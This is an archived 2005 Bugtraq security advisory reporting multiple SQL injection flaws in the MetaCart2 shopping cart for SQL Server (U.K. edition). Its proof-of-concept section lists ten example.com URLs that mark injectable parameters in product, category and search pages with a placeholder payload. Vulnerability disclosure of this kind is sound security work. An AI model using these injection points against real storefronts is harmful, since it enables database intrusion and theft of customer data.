Multiple SQL Injections in MetaCart2 for SQL Server Special Edition U.K

From: dcrab (dcrab_at_hackerscenter.com)
Date: 04/26/05

Next message: dcrab: "MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities"

Previous message: dcrab: "Multiple SQL Injections in MetaCart2 for PayPal"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 26 Apr 2005 21:40:55 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is)

Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple SQL Injections in MetaCart2 for SQL Server Special Edition
U.K
Date: 27/04/2005

Vendor: MetaCart
Vendor Website: www.metalinks.com
Summary: There are, multiple sql injections in metacart2 for sql server
special edition u.k.

Proof of Concept Exploits:

http://example.com/mcart2sqluk/product.asp?intProdID='SQL_INJECTION
SQL INJECTIONS

http://example.com/mcart2sqluk/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bpage=2
SQL INJECTIONS

http://example.com/mcart2sqluk/product.asp?intProdID='SQL_INJECTION
SQL INJECTIONS

http://example.com/mcart2sqluk/productsByCategory.asp?strSubCatalogID='SQL_INJECTION
SQL INJECTIONS

http://example.com/mcart2sqluk/searchAction.asp?chkText='SQL_INJECTION&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
SQL INJECTIONS

http://example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText='SQL_INJECTION&chkPrice=yes&intPrice=all&chkCat=yes&strCat=1
SQL INJECTIONS

http://example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice='SQL_INJECTION&intPrice=all&chkCat=yes&strCat=1
SQL INJECTIONS

http://example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice='SQL_INJECTION&chkCat=yes&strCat=1
SQL INJECTIONS

http://example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat='SQL_INJECTION&strCat=1
SQL INJECTIONS

http://example.com/mcart2sqluk/searchAction.asp?chkText=yes&strText=dcrab&chkPrice=yes&intPrice=all&chkCat=yes&strCat='SQL_INJECTION
SQL INJECTIONS

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact
me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my
soon to come out book on Secure coding with php.

Next message: dcrab: "MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities"

Previous message: dcrab: "Multiple SQL Injections in MetaCart2 for PayPal"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Multiple SQL Injections in MetaCart2 for PayPal
... Dcrab 's Security Advisory ... multiple sql injections in metacart2 for paypal. ... These vulnerabilties have been found and released by Diabolic Crab, ...
(Bugtraq)
Re: magic_quotes
... Well, from what I've read, SQL injections are still possible with ... Strictly speaking security, I personally, do not know of any other ... If there off on another server, ... get to many slashes in front of escaped characters (ex. ...
(Security-Basics)
Re: SQL injections and connections to a DB
... SQL injections and connections to a DB ... We have a IIS web server setup on our DMZ with a connection to our DB ...
(Pen-Test)
Re: Jetty Vulnerabilities?
... >I would not use this for any server requiring medium to high security. ... I tried some of the XSS attacks and SQL injections in my own network ...
(alt.computer.security)
Multiple SQL Injections in MetaBid Auctions
... Dcrab 's Security Advisory ... multiple sql injections in metabid auctions. ... These vulnerabilties have been found and released by Diabolic Crab, ...
(Bugtraq)